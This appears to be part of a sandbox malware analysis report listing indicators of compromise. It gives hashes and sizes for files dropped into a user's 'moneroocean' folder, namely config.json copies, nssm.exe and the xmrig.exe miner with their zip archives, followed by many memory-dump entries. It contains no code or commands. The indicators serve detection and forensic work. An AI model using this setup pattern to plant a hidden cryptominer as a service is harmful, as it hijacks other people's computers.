153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
01c2ee9e92c060705c6b8f6023b803c5

SHA1
2613a1da1a52687aeb5a18bce80fb93dbdddf7fe

SHA256
3005d5a17197485a07b4e64b9e29abd6906ede44e4e1df2f9427d04ad8ef3d9d

SHA512
4b6b954c7790b42aa7481937d23b42a9e527ec65178ece8fb7d6b1a4bfd29b8e5becbabefb728478cb6d5a0bf3ccc49a3d1767db2dd13871977fb2f54b6d21c2

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
785762b87b4a973ce4ae88b1913b145c

SHA1
4617c67017eba548ebe05718a129d48401604979

SHA256
cc87c18f60f2c73df343cf59d27e6cbb8e801a9929dc5dd7f0f32f653e080d28

SHA512
3c6dedba940e3000931f119d7ecf0f62d94ef42fb6c92f4c22e7a20e925d1b0a8f4410864f7e6531d067b7bcbbe0571fbf2e9294c1bbcaed65a748a02f71e691

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
76d907c145a59a26b9344793a5ae70f2

SHA1
a47c48252a6dca7577a95ea0f09a8d1fce6e50b3

SHA256
21c80857c7a0d480d868b4dfdbbc6c5c4aa3b9452839c7ecef3cf24651400727

SHA512
8c14459a11572cd70910ac6e7ea0ad963d7fd4348b1043bc38349cca57419df70dfbb3835deef9a11b1c83dc38864d51034a706eccfeb14456d18e58e9dfb55f

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
fb73ab5422c5fb6ecb3d5c6b13fabe84

SHA1
48ca70d2f9e85beaa9b415992c3b415e5958809e

SHA256
2ee0006723d9eac531a6a4ff35a8b6fab65cf0e82acdec288b434e741cc8a5c5

SHA512
612af388ea6bb31a20b8ce2b4a98ccc9b8542516550cc82866a3c84ea0715f6add9e2192e1c3c589d69591b9fa8545d26375b345d01a7e553dfed442a55f0325

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
74f60add3ff0200db938af5b5df7c9e7

SHA1
c1a7d1cf1c24e8ed3129eb02b1f4abd824fce484

SHA256
9325d5c61d0aeebd3d14db8dc687373fe7bf2484ef3bce17b6beca850be87421

SHA512
53492c07c21ac790fcade670ba2f2537179a461f3a00ab78a2af9ff172ba5355f2097725cc43854105525b400e5c87d5c77e2eaa933b3ca29bf636a099494be7

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
0e292fd5b02d1d164b421e6d3b29ec1e

SHA1
84b033871981bee606de819df7b8794c39492e43

SHA256
3d3cec02aa94fb491ad15dc51ffaf588f360bde954bddaf30e594cefd32b7978

SHA512
e9c629795b7de5bebdf806c1806601954086491242a2753903630ced37802813c912a368ca76a33a0dc443d28f5c00202871d62e24f1c9887bd1ee0d28bc5d85

Download Submit
memory/412-217-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-213-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-235-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-234-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-233-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-232-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-231-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-230-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-229-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-228-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-227-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-203-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-204-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-205-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-206-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-207-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-208-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-209-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-210-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-211-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-212-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-226-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-214-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-215-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-216-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-225-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-218-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-219-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-220-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-221-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-222-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-223-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/412-224-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/1196-0-0x00007FFD82373000-0x00007FFD82375000-memory.dmp

Filesize
8KB

Download
memory/1196-202-0x00007FFD82370000-0x00007FFD82E31000-memory.dmp

Filesize
10.8MB

Download
memory/1196-1-0x000001D839CB0000-0x000001D839CD2000-memory.dmp

Filesize
136KB

Download
memory/1196-11-0x00007FFD82370000-0x00007FFD82E31000-memory.dmp

Filesize
10.8MB

Download
memory/1196-12-0x00007FFD82370000-0x00007FFD82E31000-memory.dmp

Filesize
10.8MB

Download
memory/1196-16-0x00007FFD82373000-0x00007FFD82375000-memory.dmp

Filesize
8KB

Download
memory/1196-17-0x00007FFD82370000-0x00007FFD82E31000-memory.dmp

Filesize
10.8MB

Download
memory/1424-68-0x0000000000400000-0x000000000102E000-memory.dmp

Filesize
12.2MB

Download
memory/1424-67-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/3504-41-0x00000174FFDF0000-0x00000174FFDFA000-memory.dmp

Filesize
40KB

Download
memory/3504-42-0x00000174FFEC0000-0x00000174FFED2000-memory.dmp

Filesize
72KB

Download